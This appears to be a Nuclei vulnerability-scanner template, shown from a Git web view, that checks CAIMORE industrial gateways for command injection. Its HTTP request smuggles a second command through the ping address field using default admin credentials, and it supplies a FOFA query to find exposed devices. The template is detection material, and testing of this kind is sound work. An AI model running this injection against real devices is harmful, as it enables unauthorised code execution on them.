nuclei-templates/http/vulnerabilities/other/caimore-gateway-rce.yaml

50 lines
1.8 KiB
YAML
Raw Permalink Normal View History

2023-08-17 18:35:57 +00:00
id: caimore-gateway-rce
info:
name: CAIMORE Gateway - Remote Code Execution
author: momika233
severity: high
description: |
The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server.
reference:
- https://www.ctfiot.com/126482.html
metadata:
max-request: 2
fofa-query: app="CAIMORE-Gateway"
tags: ciamore-gateway,rce,authenticated,intrusive
http:
- raw:
- |
POST /goform/formping HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Accept-Encoding: gzip
PingAddr=127.0.0.1%7Cecho%20{{randstr}}&PingPackNumb=1&PingMsg=
- |
GET /pingmessages HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Accept-Encoding: gzip
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "{{randstr}}"
- type: status
status:
2023-08-18 05:31:18 +00:00
- 200
# digest: 4a0a00473045022100f1c59c82eeb72e14e9ac3bee3d86be3945598142b1dc170ba772eda38078b7ee02204c139e6d528334ebeb31c4f9a04fe0de155bbd472451bed27b56a945e896e718:922c64590222798bb761d5b6d8e72950